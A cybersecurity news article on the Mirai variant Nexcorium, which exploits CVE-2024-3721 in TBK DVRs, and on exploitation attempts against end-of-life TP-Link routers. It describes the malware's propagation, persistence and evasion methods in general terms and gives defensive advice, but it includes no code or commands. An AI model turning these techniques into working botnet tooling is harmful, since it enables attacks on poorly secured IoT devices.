Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Attacks
Recent findings from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 reveal that threat actors are actively exploiting vulnerabilities in TBK DVR devices and end-of-life (EoL) TP-Link Wi-Fi routers. This exploitation allows the deployment of Mirai-botnet variants, particularly a new variant named Nexcorium, on compromised devices. The implications of these attacks are significant, highlighting ongoing vulnerabilities in Internet of Things (IoT) devices and the persistent threat landscape they present.
Understanding the Vulnerability
The attack specifically targets TBK DVR devices by exploiting a command injection vulnerability identified as CVE-2024-3721, which has a CVSS score of 6.3. This medium-severity vulnerability affects TBK DVR-4104 and DVR-4216 models, enabling attackers to deliver the Nexcorium variant of the Mirai botnet. Security researcher Vincent Li emphasizes that IoT devices are increasingly becoming prime targets for large-scale attacks due to their widespread use, inadequate patching, and often weak security configurations.
Li states, “Threat actors continue exploiting known vulnerabilities to gain initial access and deploy malware that can persist, spread, and cause distributed denial-of-service (DDoS) attacks.”
Historical Context of the Vulnerability
This is not the first instance of CVE-2024-3721 being exploited. Over the past year, it has been leveraged to deploy various Mirai variants and a newer botnet known as RondoDox. In September 2025, CloudSEK disclosed a large-scale loader-as-a-service botnet that distributed RondoDox, Mirai, and Morte payloads through weak credentials and outdated vulnerabilities in routers, IoT devices, and enterprise applications.
The exploitation of CVE-2024-3721 involves dropping a downloader script that launches the botnet payload based on the architecture of the Linux system. Once executed, the malware displays a message indicating that “nexuscorp has taken control.”
Technical Details of the Nexcorium Botnet
Nexcorium shares architectural similarities with previous Mirai variants, including XOR-encoded configuration table initialization, a watchdog module, and a DDoS attack module. The malware also exploits CVE-2017-17215 to target Huawei HG532 devices within the network. It incorporates a list of hard-coded usernames and passwords to facilitate brute-force attacks via Telnet connections.
If successful, the malware attempts to obtain a shell, establish persistence using crontab and systemd service, and connect to an external server to await commands for launching DDoS attacks over various protocols, including UDP, TCP, and SMTP. Once it establishes persistence, the malware deletes the original downloaded binary to evade detection and analysis.
Fortinet notes, “The Nexcorium malware displays typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to sustain long-term access to infected systems.” The use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, underscores its adaptability and effectiveness in broadening its infection reach.
Ongoing Threats and Security Measures
Unit 42 has also reported active, automated scans and probes attempting to exploit CVE-2023-33538, another command injection vulnerability impacting EoL TP-Link wireless routers. Although these attempts have been flawed and unsuccessful, they confirm the existence of real vulnerabilities that can be exploited. This particular vulnerability was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) catalog in June 2025 and affects several TP-Link models, including TL-WR940N v2 and v4, TL-WR740N v1 and v2, and TL-WR841N v8 and v10.
Researchers Asher Davila, Malav Vyas, and Chris Navarrete assert, “Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real.” Successful exploitation requires authentication to the router’s web interface, making it imperative for users to implement robust security measures.
Recommendations for Users
Given that the affected TP-Link devices are no longer actively supported, users are strongly advised to replace them with newer models and ensure that default credentials are not utilized. The persistent risk of default credentials in IoT devices continues to shape the security landscape, as these credentials can transform a limited, authenticated vulnerability into a critical entry point for determined attackers.
Unit 42 emphasizes, “For the foreseeable future, the security landscape will continue to be shaped by the persistent risk of default credentials in IoT devices.”
As the cybersecurity landscape evolves, organizations and individuals must remain vigilant and proactive in addressing vulnerabilities in IoT devices. The Nexcorium variant’s exploitation of CVE-2024-3721 serves as a stark reminder of the ongoing challenges in securing interconnected devices.
For further insights, refer to the original reporting source: thehackernews.com.
Keep reading for the latest cybersecurity developments, threat intelligence and breaking updates from across the Middle East.
